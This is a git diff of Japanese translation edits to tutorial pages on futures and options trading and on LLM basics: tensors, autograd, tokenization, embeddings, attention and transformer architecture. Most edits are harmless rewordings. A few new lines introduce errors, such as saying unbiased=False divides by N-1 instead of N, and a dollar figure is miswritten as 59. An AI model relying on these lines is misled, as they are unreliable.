-しかし、これは製品を生産しているビジネスにとって、コストを支払うための価格で販売できるという保証が必要な場合に興味深いです。また、将来の何かのために固定価格を確保したいビジネスにも適しています。
+しかし、これは製品を生産しているビジネスにとって、コストを支払うための価格で販売できるという保証が必要な場合に興味深いです。また、将来の何かのために固定価格を確保したいビジネスにも役立ちます。
 
 ただし、取引所では通常、利益を得るために使用されます。
 
@@ -29,22 +29,22 @@
 
 ### 永続的先物
 
-**これは「先物」で、無期限に続くものです**（終了契約日がありません）。暗号取引所などで、暗号の価格に基づいて先物に出入りできることが非常に一般的です。
+**これは無期限に続く「先物」です**（終了契約日がありません）。暗号取引所などで、暗号の価格に基づいて先物に出入りできることが非常に一般的です。
 
-これらの場合、利益と損失はリアルタイムで発生することに注意してください。価格が1%上昇すれば1%の利益、価格が1%下がればその分の損失を被ります。
+これらの場合、利益と損失はリアルタイムで発生することに注意してください。価格が1%上昇すれば1%の利益、価格が1%下がればその分の損失が発生します。
 
 ### レバレッジ付き先物
 
 **レバレッジ**は、少ない金額で市場での大きなポジションをコントロールできるようにします。基本的には、実際に持っているお金だけをリスクにさらしながら、はるかに多くのお金を「賭ける」ことを可能にします。
 
 例えば、100ドルで50倍のレバレッジを使ってBTC/USDTの先物ポジションを開くと、価格が1%上昇すれば、初期投資の1x50 = 50%（50ドル）の利益を得ることになります。したがって、150ドルになります。\
-しかし、価格が1%下がると、資金の50%（この場合59ドル）を失います。価格が2%下がると、全額を失います（2x50 = 100%）。
+しかし、価格が1%下がると、資金の50%（この場合59ドル）を失います。価格が2%下がると、全額（2x50 = 100%）を失います。
 
 したがって、レバレッジを使用すると、賭ける金額をコントロールしながら、利益と損失を増やすことができます。
 
 ## 先物とオプションの違い
 
-先物とオプションの主な違いは、契約が買い手にとってオプションであることです：彼はそれを実行するかどうかを決定できます（通常、利益がある場合のみ実行します）。売り手は、買い手がオプションを使用したい場合、販売しなければなりません。\
+先物とオプションの主な違いは、契約が買い手にとって任意であることです：彼はそれを実行するかどうかを決定できます（通常、利益がある場合のみ実行します）。売り手は、買い手がオプションを使用したい場合、販売しなければなりません。\
 ただし、買い手はオプションを開くために売り手に手数料を支払う必要があります（したがって、リスクを取っている売り手は、いくらかの利益を得ることになります）。
 
 ### 1. **義務 vs. 権利:**
@@ -54,7 +54,7 @@
 
 ### 2. **リスク:**
 
-* **先物:** 買い手と売り手の両方が**無制限のリスク**を負います。リスクは、合意された価格と満了日の市場価格の差です。
+* **先物:** 買い手と売り手の両方が**無制限のリスク**を負います。リスクは、合意された価格と満了日での市場価格の差です。
 * **オプション:** 買い手のリスクは、オプションを購入するために支払った**プレミアム**に制限されます。市場がオプション保有者に有利に動かない場合、彼らは単にオプションを失効させることができます。ただし、オプションの**売り手**（ライター）は、市場が大きく不利に動いた場合、無制限のリスクを負います。
 
 ### 3. **コスト:**
@@ -65,4 +65,4 @@
 ### 4. **利益の可能性:**
 
 * **先物:** 利益または損失は、満了時の市場価格と契約で合意された価格の差に基づいています。
-* **オプション:** 買い手は、市場がプレミアムを超えてストライク価格を有利に動いたときに利益を得ます。売り手は、オプションが行使されない場合、プレミアムを保持することで利益を得ます。
+* **オプション:** 買い手は、市場がプレミアムを超えてストライク価格を有利に動いたときに利益を得ます。売り手は、オプションが行使されない場合にプレミアムを保持することで利益を得ます。
diff --git a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
index 23c233a8b..54c3ca0eb 100644
--- a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
+++ b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
@@ -37,7 +37,7 @@ PyTorchにおいて、**テンソル**は基本的なデータ構造であり、
 - **スカラー**: ランク0のテンソルで、単一の数値（ゼロ次元）を表します。例: 5
 - **ベクトル**: ランク1のテンソルで、数値の一次元配列を表します。例: \[5,1]
 - **行列**: ランク2のテンソルで、行と列を持つ二次元配列を表します。例: \[\[1,3], \[5,2]]
-- **高次ランクテンソル**: ランク3以上のテンソルで、より高次元のデータを表します（例: カラー画像のための3Dテンソル）。
+- **高次ランクテンソル**: ランク3以上のテンソルで、より高次元のデータを表します（例: カラー画像用の3Dテンソル）。
 
 ### データコンテナとしてのテンソル
 
@@ -79,8 +79,8 @@ PyTorch テンソルは、整数や浮動小数点数など、さまざまなタ
 tensor1d = torch.tensor([1, 2, 3])
 print(tensor1d.dtype)  # Output: torch.int64
 ```
-- Pythonの整数から作成されたテンソルは`torch.int64`型です。
-- Pythonの浮動小数点数から作成されたテンソルは`torch.float32`型です。
+- Pythonの整数から作成されたテンソルは、型`torch.int64`です。
+- Pythonの浮動小数点数から作成されたテンソルは、型`torch.float32`です。
 
 テンソルのデータ型を変更するには、`.to()`メソッドを使用します：
 ```python
@@ -117,10 +117,10 @@ result = tensor2d @ tensor2d.T
 
 ### 深層学習における重要性
 
-テンソルはPyTorchにおいてニューラルネットワークを構築し、訓練するために不可欠です：
+テンソルはPyTorchにおいてニューラルネットワークを構築し、トレーニングするために不可欠です：
 
 - 入力データ、重み、バイアスを格納します。
-- 訓練アルゴリズムにおける前方および後方のパスに必要な操作を促進します。
+- トレーニングアルゴリズムにおける前方および後方のパスに必要な操作を促進します。
 - autogradを使用することで、テンソルは勾配の自動計算を可能にし、最適化プロセスを効率化します。
 
 ## 自動微分
@@ -133,7 +133,7 @@ result = tensor2d @ tensor2d.T
 
 自動微分の中心には、微積分の**チェーンルール**があります。チェーンルールは、関数の合成がある場合、合成関数の導関数は合成された関数の導関数の積であると述べています。
 
-数学的には、`y=f(u)`および`u=g(x)`の場合、`x`に関する`y`の導関数は次のようになります：
+数学的には、`y=f(u)`および`u=g(x)`の場合、`y`の`x`に関する導関数は次のようになります：
 
 <figure><img src="../../images/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
@@ -195,7 +195,7 @@ print("Gradient w.r.t b:", b.grad)
 cssCopy codeGradient w.r.t w: tensor([-0.0898])
 Gradient w.r.t b: tensor([-0.0817])
 ```
-## バックプロパゲーションと大規模ニューラルネットワーク
+## バックプロパゲーションにおける大規模ニューラルネットワーク
 
 ### **1. マルチレイヤーネットワークへの拡張**
 
@@ -221,7 +221,7 @@ Gradient w.r.t b: tensor([-0.0817])
 
 ### **4. PyTorchの実装**
 
-PyTorchはそのautogradエンジンを使用してこのプロセスを簡素化します。
+PyTorchはその自動微分エンジンによってこのプロセスを簡素化します。
 ```python
 import torch
 import torch.nn as nn
@@ -267,8 +267,8 @@ print(f"Gradient of {name}: {param.grad}")
 このコードでは：
 
 - **フォワードパス：** ネットワークの出力を計算します。
-- **バックワードパス：** `loss.backward()` は、すべてのパラメータに対する損失の勾配を計算します。
-- **パラメータ更新：** `optimizer.step()` は、計算された勾配に基づいてパラメータを更新します。
+- **バックワードパス：** `loss.backward()` は損失に対するすべてのパラメータの勾配を計算します。
+- **パラメータ更新：** `optimizer.step()` は計算された勾配に基づいてパラメータを更新します。
 
 ### **5. バックワードパスの理解**
 
@@ -281,5 +281,5 @@ print(f"Gradient of {name}: {param.grad}")
 ### **6. 自動微分の利点**
 
 - **効率性：** 中間結果を再利用することで冗長な計算を回避します。
-- **精度：** 機械精度までの正確な導関数を提供します。
+- **正確性：** 機械精度までの正確な導関数を提供します。
 - **使いやすさ：** 導関数の手動計算を排除します。
diff --git a/src/todo/llm-training-data-preparation/1.-tokenizing.md b/src/todo/llm-training-data-preparation/1.-tokenizing.md
index c4b122834..eb84e5736 100644
--- a/src/todo/llm-training-data-preparation/1.-tokenizing.md
+++ b/src/todo/llm-training-data-preparation/1.-tokenizing.md
@@ -1,13 +1,13 @@
-# 1. トークナイジング
+# 1. トークン化
 
-## トークナイジング
+## トークン化
 
-**トークナイジング**は、テキストなどのデータを小さく管理しやすい部分、すなわち_トークン_に分解するプロセスです。各トークンには一意の数値識別子（ID）が割り当てられます。これは、特に自然言語処理（NLP）において、機械学習モデルによる処理のためにテキストを準備する基本的なステップです。
+**トークン化**は、テキストなどのデータを小さく管理しやすい部分、すなわち_トークン_に分解するプロセスです。各トークンには一意の数値識別子（ID）が割り当てられます。これは、特に自然言語処理（NLP）において、機械学習モデルによる処理のためにテキストを準備する基本的なステップです。
 
 > [!TIP]
 > この初期段階の目標は非常にシンプルです：**入力を意味のある方法でトークン（ID）に分割すること**。
 
-### **トークナイジングの仕組み**
+### **トークン化の仕組み**
 
 1. **テキストの分割:**
 - **基本トークナイザー:** シンプルなトークナイザーは、テキストを個々の単語や句読点に分割し、スペースを削除します。
@@ -25,13 +25,13 @@
 もし`"Hello"`がID `64`、`","`が`455`、`"world"`が`78`、`"!"`が`467`に割り当てられている場合：\
 `"Hello, world!"` → `[64, 455, 78, 467]`
 - **未知の単語の処理:**\
-もし`"Bye"`のような単語が語彙にない場合、`[UNK]`に置き換えられます。\
+もし`"Bye"`のような単語が語彙にない場合、`[UNK]`で置き換えられます。\
 `"Bye, world!"` → `["[UNK]", ",", "world", "!"]` → `[987, 455, 78, 467]`\
 &#xNAN;_(`[UNK]`がID `987`であると仮定)_
 
-### **高度なトークナイジング手法**
+### **高度なトークン化手法**
 
-基本的なトークナイザーはシンプルなテキストにはうまく機能しますが、大きな語彙や新しいまたは珍しい単語の処理には限界があります。高度なトークナイジング手法は、テキストを小さなサブユニットに分解したり、トークナイジングプロセスを最適化したりすることで、これらの問題に対処します。
+基本的なトークナイザーはシンプルなテキストにはうまく機能しますが、大きな語彙や新しいまたは珍しい単語の処理には限界があります。高度なトークン化手法は、テキストを小さなサブユニットに分解したり、トークン化プロセスを最適化したりすることでこれらの問題に対処します。
 
 1. **バイトペアエンコーディング（BPE）:**
 - **目的:** 語彙のサイズを削減し、珍しいまたは未知の単語を頻繁に出現するバイトペアに分解することで処理します。
@@ -40,10 +40,10 @@
 - 最も頻繁に出現するトークンのペアを反復的に1つのトークンにマージします。
 - これ以上頻繁なペアがマージできなくなるまで続けます。
 - **利点:**
-- すべての単語が既存のサブワードトークンを組み合わせることで表現できるため、`[UNK]`トークンの必要がなくなります。
+- すべての単語が既存のサブワードトークンを組み合わせることで表現できるため、`[UNK]`トークンが不要になります。
 - より効率的で柔軟な語彙。
 - _例:_\
-`"playing"`は、`"play"`と`"ing"`が頻繁なサブワードであれば、`["play", "ing"]`としてトークナイズされるかもしれません。
+`"playing"`は、`"play"`と`"ing"`が頻繁なサブワードであれば、`["play", "ing"]`としてトークン化されるかもしれません。
 2. **WordPiece:**
 - **使用モデル:** BERTのようなモデル。
 - **目的:** BPEと同様に、未知の単語を処理し、語彙のサイズを削減するために単語をサブワードユニットに分解します。
@@ -55,7 +55,7 @@
 - 管理可能な語彙サイズと効果的な単語表現のバランスを取ります。
 - 珍しい単語や複合語を効率的に処理します。
 - _例:_\
-`"unhappiness"`は、語彙に応じて`["un", "happiness"]`または`["un", "happy", "ness"]`としてトークナイズされるかもしれません。
+`"unhappiness"`は、語彙に応じて`["un", "happiness"]`または`["un", "happy", "ness"]`としてトークン化されるかもしれません。
 3. **ユニグラム言語モデル:**
 - **使用モデル:** SentencePieceのようなモデル。
 - **目的:** 最も可能性の高いサブワードトークンのセットを決定するために確率モデルを使用します。
@@ -65,9 +65,9 @@
 - 各単語が最も確率の高いサブワードユニットで表現される語彙を最終化します。
 - **利点:**
 - 柔軟で、より自然に言語をモデル化できます。
-- より効率的でコンパクトなトークナイジングを実現することが多いです。
+- より効率的でコンパクトなトークン化を実現することが多いです。
 - _例:_\
-`"internationalization"`は、`["international", "ization"]`のような小さく意味のあるサブワードにトークナイズされるかもしれません。
+`"internationalization"`は、`["international", "ization"]`のような小さく意味のあるサブワードにトークン化されるかもしれません。
 
 ## コード例
 
diff --git a/src/todo/llm-training-data-preparation/3.-token-embeddings.md b/src/todo/llm-training-data-preparation/3.-token-embeddings.md
index 5641d6123..e99a7ced5 100644
--- a/src/todo/llm-training-data-preparation/3.-token-embeddings.md
+++ b/src/todo/llm-training-data-preparation/3.-token-embeddings.md
@@ -5,10 +5,10 @@
 テキストデータをトークン化した後、大規模言語モデル（LLM）をトレーニングするためのデータ準備における次の重要なステップは、**トークン埋め込み**を作成することです。トークン埋め込みは、離散トークン（単語やサブワードなど）をモデルが処理し学習できる連続的な数値ベクトルに変換します。この説明では、トークン埋め込み、その初期化、使用法、およびトークンシーケンスのモデル理解を向上させる位置埋め込みの役割について説明します。
 
 > [!TIP]
-> この第3段階の目標は非常にシンプルです：**語彙内の各トークンに対して、モデルをトレーニングするために必要な次元のベクトルを割り当てることです。** 語彙内の各単語は、X次元の空間内の点になります。\
+> この第3段階の目標は非常にシンプルです：**語彙内の以前の各トークンに、モデルをトレーニングするために必要な次元のベクトルを割り当てることです。** 語彙内の各単語は、X次元の空間内の点になります。\
 > 最初は、空間内の各単語の位置は「ランダムに」初期化され、これらの位置はトレーニング中に改善されるトレーニング可能なパラメータです。
 >
-> さらに、トークン埋め込みの間に**別の埋め込み層が作成され**、これは（この場合）**トレーニング文における単語の絶対位置**を表します。このように、文中の異なる位置にある単語は異なる表現（意味）を持ちます。
+> さらに、トークン埋め込みの間に**別の埋め込み層が作成され**、これは（この場合）**トレーニング文における単語の絶対位置を表します**。このように、文中の異なる位置にある単語は異なる表現（意味）を持ちます。
 
 ### **トークン埋め込みとは？**
 
@@ -24,7 +24,7 @@
 
 ### **トークン埋め込みの初期化**
 
-トレーニングの開始時に、トークン埋め込みは通常、小さなランダム値で初期化されます。これらの初期値は、トレーニングデータに基づいてトークンの意味をよりよく表現するようにトレーニング中に調整（ファインチューニング）されます。
+トレーニングの開始時に、トークン埋め込みは通常、小さなランダム値で初期化されます。これらの初期値は、トレーニングデータに基づいてトークンの意味をよりよく表現するように調整（ファインチューニング）されます。
 
 **PyTorchの例：**
 ```python
@@ -70,14 +70,14 @@ tensor([[-0.4015,  0.9666, -1.1481]], grad_fn=<EmbeddingBackward0>)
 - インデックス `3` のトークンはベクトル `[-0.4015, 0.9666, -1.1481]` で表されます。
 - これらの値は、モデルがトレーニング中に調整するトレーニング可能なパラメータであり、トークンのコンテキストと意味をよりよく表現します。
 
-### **トレーニング中のトークン埋め込みの動作**
+### **トークン埋め込みがトレーニング中にどのように機能するか**
 
-トレーニング中、入力データの各トークンは対応する埋め込みベクトルに変換されます。これらのベクトルは、その後、注意メカニズムやニューラルネットワーク層など、モデル内のさまざまな計算に使用されます。
+トレーニング中、入力データの各トークンは対応する埋め込みベクトルに変換されます。これらのベクトルは、注意メカニズムやニューラルネットワーク層など、モデル内のさまざまな計算に使用されます。
 
 **例のシナリオ:**
 
-- **バッチサイズ:** 8 (同時に処理されるサンプルの数)
-- **最大シーケンス長:** 4 (サンプルごとのトークンの数)
+- **バッチサイズ:** 8（同時に処理されるサンプルの数）
+- **最大シーケンス長:** 4（サンプルごとのトークンの数）
 - **埋め込み次元:** 256
 
 **データ構造:**
@@ -134,7 +134,7 @@ cssCopy codeBatch
 
 1. **絶対位置埋め込み:**
 - シーケンス内の各位置にユニークな位置ベクトルを割り当てます。
-- **例:** どのシーケンスの最初のトークンも同じ位置埋め込みを持ち、2番目のトークンは別のものを持ち、以下同様です。
+- **例:** どのシーケンスの最初のトークンは同じ位置埋め込みを持ち、2番目のトークンは別の位置埋め込みを持ちます。
 - **使用例:** OpenAIのGPTモデル。
 2. **相対位置埋め込み:**
 - トークンの絶対位置ではなく、トークン間の相対的な距離をエンコードします。
@@ -144,7 +144,7 @@ cssCopy codeBatch
 ### **位置埋め込みの統合方法:**
 
 - **同じ次元:** 位置埋め込みはトークン埋め込みと同じ次元を持ちます。
-- **加算:** それらはトークン埋め込みに加算され、トークンのアイデンティティと位置情報を組み合わせ、全体の次元を増やすことなく行われます。
+- **加算:** それらはトークン埋め込みに加算され、トークンのアイデンティティと位置情報を組み合わせ、全体の次元を増やすことなく統合されます。
 
 **位置埋め込みを追加する例:**
 
diff --git a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
index 9764ec053..f34f0c549 100644
--- a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
+++ b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
@@ -2,10 +2,10 @@
 
 ## ニューラルネットワークにおける注意メカニズムと自己注意
 
-注意メカニズムは、ニューラルネットワークが出力の各部分を生成する際に**入力の特定の部分に焦点を当てる**ことを可能にします。これにより、異なる入力に異なる重みが割り当てられ、モデルが現在のタスクに最も関連する入力を決定するのに役立ちます。これは、文全体の文脈を理解することが正確な翻訳に必要な機械翻訳のようなタスクにおいて重要です。
+注意メカニズムは、ニューラルネットワークが出力の各部分を生成する際に**入力の特定の部分に焦点を当てる**ことを可能にします。これにより、異なる入力に異なる重みが割り当てられ、モデルが現在のタスクに最も関連性の高い入力を決定するのに役立ちます。これは、文全体の文脈を理解することが正確な翻訳に必要な機械翻訳のようなタスクにおいて重要です。
 
 > [!TIP]
-> この第4段階の目標は非常にシンプルです：**いくつかの注意メカニズムを適用する**ことです。これらは、**語彙内の単語と現在の文の隣接単語との関係を捉えるための多くの** **繰り返し層** になります。\
+> この第4段階の目標は非常にシンプルです：**いくつかの注意メカニズムを適用する**ことです。これらは、**語彙内の単語と現在の文の隣接単語との関係を捉えるための多くの**繰り返し層**になります。\
 > これには多くの層が使用されるため、多くの学習可能なパラメータがこの情報を捉えることになります。
 
 ### 注意メカニズムの理解
@@ -14,7 +14,7 @@
 
 #### 例：機械翻訳
 
-ドイツ語の文「Kannst du mir helfen diesen Satz zu übersetzen」を英語に翻訳することを考えてみましょう。単語ごとの翻訳では、言語間の文法構造の違いにより、文法的に正しい英語の文は生成されません。注意メカニズムは、モデルが出力文の各単語を生成する際に入力文の関連部分に焦点を当てることを可能にし、より正確で一貫した翻訳を実現します。
+ドイツ語の文「Kannst du mir helfen diesen Satz zu übersetzen」を英語に翻訳することを考えてみましょう。単語ごとの翻訳では、言語間の文法構造の違いにより、文法的に正しい英語の文は生成されません。注意メカニズムは、出力文の各単語を生成する際に入力文の関連部分に焦点を当てることを可能にし、より正確で一貫した翻訳を実現します。
 
 ### 自己注意の紹介
 
@@ -43,22 +43,22 @@
 
 文中の各単語について、**"shiny"**に対する**注意スコア**を、その埋め込みのドット積を計算することで求めます。
 
-**"Hello"**と**"shiny"**の注意スコア
+**"Hello"と"shiny"の注意スコア**
 
 <figure><img src="../../images/image (4) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
-**"shiny"**と**"shiny"**の注意スコア
+**"shiny"と"shiny"の注意スコア**
 
 <figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
-**"sun"**と**"shiny"**の注意スコア
+**"sun"と"shiny"の注意スコア**
 
 <figure><img src="../../images/image (2) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
 #### ステップ2：注意スコアを正規化して注意重みを得る
 
 > [!TIP]
-> 数学用語に迷わないでください。この関数の目標はシンプルで、すべての重みを正規化して**合計が1になる**ことです。\
+> 数学用語に迷わないでください。この関数の目標はシンプルです。すべての重みを正規化して**合計が1になるようにします**。\
 > さらに、**softmax**関数が使用されるのは、指数部分によって違いを強調し、有用な値を検出しやすくするためです。
 
 注意スコアに**softmax関数**を適用して、合計が1になる注意重みに変換します。
@@ -88,15 +88,15 @@
 
 各成分の計算：
 
-- **"Hello"**の重み付き埋め込み：
+- **"Hello"の重み付き埋め込み**：
 
 <figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-- **"shiny"**の重み付き埋め込み：
+- **"shiny"の重み付き埋め込み**：
 
 <figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-- **"sun"**の重み付き埋め込み：
+- **"sun"の重み付き埋め込み**：
 
 <figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
@@ -118,7 +118,7 @@
 
 <figure><img src="../../images/image (10) (1) (1).png" alt="" width="239"><figcaption></figcaption></figure>
 
-クエリは以前と同様に使用するデータであり、キーと値の行列はランダムに学習可能な行列です。
+クエリは以前と同様に使用するデータであり、キーと値の行列は単にランダムに学習可能な行列です。
 
 #### ステップ1：クエリ、キー、および値の計算
 
@@ -169,7 +169,7 @@ values = torch.matmul(inputs, W_value)
 > [!TIP]
 > スコアは次元の平方根で割られます。なぜなら、ドット積が非常に大きくなる可能性があり、これがそれらを調整するのに役立つからです。
 
-**アテンションウェイトを得るためにソフトマックスを適用:** 最初の例と同様に、すべての値を正規化して合計が1になるようにします。&#x20;
+**アテンションウェイトを得るためにソフトマックスを適用:** 最初の例のように、すべての値を正規化して合計が1になるようにします。&#x20;
 
 <figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>
 
@@ -229,7 +229,7 @@ LLMでは、モデルが現在の位置の前に出現するトークンのみ
 
 ### 因果注意マスクの適用
 
-因果注意を実装するために、ソフトマックス操作の**前に**注意スコアにマスクを適用します。これにより、残りのスコアは依然として1に合計されます。このマスクは、将来のトークンの注意スコアを負の無限大に設定し、ソフトマックスの後にその注意重みがゼロになることを保証します。
+因果注意を実装するために、ソフトマックス操作**の前に**注意スコアにマスクを適用します。これにより、残りのスコアは依然として1に合計されます。このマスクは、将来のトークンの注意スコアを負の無限大に設定し、ソフトマックスの後にその注意重みがゼロになることを保証します。
 
 **手順**
 
diff --git a/src/todo/llm-training-data-preparation/5.-llm-architecture.md b/src/todo/llm-training-data-preparation/5.-llm-architecture.md
index a6cdd88fe..d1bb6303c 100644
--- a/src/todo/llm-training-data-preparation/5.-llm-architecture.md
+++ b/src/todo/llm-training-data-preparation/5.-llm-architecture.md
@@ -3,11 +3,11 @@
 ## LLMアーキテクチャ
 
 > [!TIP]
-> この第5段階の目標は非常にシンプルです：**完全なLLMのアーキテクチャを開発すること**。すべてをまとめ、すべてのレイヤーを適用し、テキストを生成したり、テキストをIDに変換したり、その逆を行うためのすべての機能を作成します。
+> この第5段階の目標は非常にシンプルです: **完全なLLMのアーキテクチャを開発すること**。すべてをまとめ、すべてのレイヤーを適用し、テキストを生成したり、テキストをIDに変換したり、その逆を行うためのすべての機能を作成します。
 >
 > このアーキテクチャは、トレーニングとトレーニング後のテキスト予測の両方に使用されます。
 
-LLMアーキテクチャの例は[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb)から：
+LLMアーキテクチャの例は[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb)から取得できます：
 
 高レベルの表現は以下に示されています：
 
@@ -21,7 +21,7 @@ LLMアーキテクチャの例は[https://github.com/rasbt/LLMs-from-scratch/blo
 - **フィードフォワードレイヤー**: アテンションレイヤーからの情報を処理し、次のトークンについての予測を行う役割を担います。
 - **ドロップアウトレイヤー**: これらのレイヤーは、トレーニング中にユニットをランダムにドロップすることで過学習を防ぎます。
 4. **最終出力レイヤー**: モデルは**4x50,257次元のテンソル**を出力します。ここで**50,257**は語彙のサイズを表します。このテンソルの各行は、モデルがシーケンス内の次の単語を予測するために使用するベクトルに対応します。
-5. **目標**: 目的は、これらの埋め込みを取得し、再びテキストに変換することです。具体的には、出力の最後の行が次の単語を生成するために使用され、図では「forward」と表されています。
+5. **目標**: 目的は、これらの埋め込みを取得し、再びテキストに変換することです。具体的には、出力の最後の行が次の単語を生成するために使用され、この図では「forward」として表されています。
 
 ### コード表現
 ```python
@@ -217,11 +217,11 @@ torch.sqrt(torch.tensor(2.0 / torch.pi)) *
 <figure><img src="../../images/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 > [!NOTE]
-> FeedForward層内の線形層の後にこの関数を使用する目的は、線形データを非線形に変換し、モデルが複雑な非線形関係を学習できるようにすることです。
+> FeedForward層内の線形層の後にこの関数を使用する目的は、線形データを非線形に変換し、モデルが複雑で非線形な関係を学習できるようにすることです。
 
 ### **フィードフォワードニューラルネットワーク**
 
-_行列の形状をよりよく理解するために、形状がコメントとして追加されています:_
+_形状は行列の形状をよりよく理解するためにコメントとして追加されています:_
 ```python
 # From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 class FeedForward(nn.Module):
@@ -247,7 +247,7 @@ return x  # Output shape: (batch_size, seq_len, emb_dim)
 - **層の詳細:**
 - **最初の線形層:** 次元を `emb_dim` から `4 * emb_dim` に拡張します。
 - **GELU活性化:** 非線形性を適用します。
-- **第二の線形層:** 次元を再び `emb_dim` に減少させます。
+- **第二の線形層:** 次元を元の `emb_dim` に戻します。
 
 > [!NOTE]
 > ご覧の通り、フィードフォワードネットワークは3層を使用しています。最初の層は線形層で、線形重み（モデル内でトレーニングするパラメータ）を使用して次元を4倍にします。その後、GELU関数がすべての次元に適用され、より豊かな表現を捉えるための非線形変化が行われ、最後に別の線形層が使用されて元の次元サイズに戻ります。
@@ -258,20 +258,20 @@ return x  # Output shape: (batch_size, seq_len, emb_dim)
 
 #### **目的と機能**
 
-- **マルチヘッド自己注意:** トークンをエンコードする際に、入力シーケンス内の異なる位置にモデルが焦点を合わせることを可能にします。
+- **マルチヘッド自己注意:** トークンをエンコードする際に、モデルが入力シーケンス内の異なる位置に焦点を合わせることを可能にします。
 - **主要なコンポーネント:**
 - **クエリ、キー、値:** 入力の線形射影で、注意スコアを計算するために使用されます。
-- **ヘッド:** 複数の注意メカニズムが並行して実行されます（`num_heads`）、それぞれが減少した次元（`head_dim`）を持ちます。
+- **ヘッド:** 複数の注意メカニズムが並行して実行されます（`num_heads`）、それぞれが縮小された次元（`head_dim`）を持ちます。
 - **注意スコア:** クエリとキーのドット積として計算され、スケーリングとマスキングが行われます。
-- **マスキング:** 将来のトークンにモデルが注意を向けないようにする因果マスクが適用されます（GPTのような自己回帰モデルにとって重要です）。
+- **マスキング:** 将来のトークンにモデルが注意を向けないように因果マスクが適用されます（GPTのような自己回帰モデルにとって重要です）。
 - **注意重み:** マスクされたスケーリングされた注意スコアのソフトマックス。
-- **コンテキストベクター:** 注意重みに従った値の加重和。
-- **出力射影:** すべてのヘッドの出力を組み合わせるための線形層。
+- **コンテキストベクトル:** 注意重みに従った値の加重和。
+- **出力射影:** すべてのヘッドの出力を結合するための線形層。
 
 > [!NOTE]
 > このネットワークの目標は、同じコンテキスト内のトークン間の関係を見つけることです。さらに、トークンは異なるヘッドに分割され、最終的に見つかった関係はこのネットワークの最後で結合されるため、過学習を防ぎます。
 >
-> さらに、トレーニング中に **因果マスク** が適用され、特定のトークンに対する関係を見ているときに後のトークンが考慮されないようにし、**ドロップアウト** も適用されて **過学習を防ぎます**。
+> さらに、トレーニング中に**因果マスク**が適用され、特定のトークンに対する関係を見ているときに後のトークンが考慮されないようにし、**ドロップアウト**も適用されて**過学習を防ぎます**。
 
 ### **層** 正規化
 ```python
@@ -297,7 +297,7 @@ return self.scale * norm_x + self.shift
 - **`scale` と `shift`:** 正規化された出力をスケールおよびシフトするためにモデルが学習可能なパラメータ（`nn.Parameter`）。それぞれ1と0で初期化される。
 - **正規化プロセス:**
 - **平均の計算（`mean`）:** 埋め込み次元（`dim=-1`）に沿った入力 `x` の平均を計算し、ブロードキャストのために次元を保持する（`keepdim=True`）。
-- **分散の計算（`var`）:** 埋め込み次元に沿った `x` の分散を計算し、同様に次元を保持する。`unbiased=False` パラメータは、バイアス推定量を使用して分散が計算されることを保証する（`N-1` ではなく `N` で割る）。これは、サンプルではなく特徴に対して正規化する際に適切である。
+- **分散の計算（`var`）:** 埋め込み次元に沿った `x` の分散を計算し、同様に次元を保持する。`unbiased=False` パラメータは、バイアス推定量を使用して分散が計算されることを保証する（`N` で割る代わりに `N-1` で割る）。これは、サンプルではなく特徴に対して正規化する際に適切である。
 - **正規化（`norm_x`）:** `x` から平均を引き、分散に `eps` を加えた平方根で割る。
 - **スケールとシフト:** 正規化された出力に学習可能な `scale` と `shift` パラメータを適用する。
 
@@ -306,7 +306,7 @@ return self.scale * norm_x + self.shift
 
 ### **トランスフォーマーブロック**
 
-_形状を理解するために、行列の形状にコメントが追加されています:_
+_行列の形状をよりよく理解するために、コメントとして形状が追加されています:_
 ```python
 # From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 
@@ -348,31 +348,31 @@ return x  # Output shape: (batch_size, seq_len, emb_dim)
 ```
 #### **目的と機能**
 
-- **レイヤーの構成:** マルチヘッドアテンション、フィードフォワードネットワーク、レイヤー正規化、残差接続を組み合わせる。
-- **レイヤー正規化:** 安定したトレーニングのためにアテンションとフィードフォワードレイヤーの前に適用される。
-- **残差接続（ショートカット）:** レイヤーの入力を出力に加えて勾配の流れを改善し、深いネットワークのトレーニングを可能にする。
-- **ドロップアウト:** 正則化のためにアテンションとフィードフォワードレイヤーの後に適用される。
+- **層の構成:** マルチヘッドアテンション、フィードフォワードネットワーク、レイヤーノーマライゼーション、残差接続を組み合わせる。
+- **レイヤーノーマライゼーション:** 安定したトレーニングのためにアテンションとフィードフォワード層の前に適用される。
+- **残差接続（ショートカット）:** 層の入力を出力に加えて勾配の流れを改善し、深いネットワークのトレーニングを可能にする。
+- **ドロップアウト:** 正則化のためにアテンションとフィードフォワード層の後に適用される。
 
 #### **ステップバイステップの機能**
 
 1. **最初の残差パス（自己アテンション）:**
 - **入力（`shortcut`）:** 残差接続のために元の入力を保存する。
-- **レイヤーノルム（`norm1`）:** 入力を正規化する。
+- **レイヤーノーム（`norm1`）:** 入力を正規化する。
 - **マルチヘッドアテンション（`att`）:** 自己アテンションを適用する。
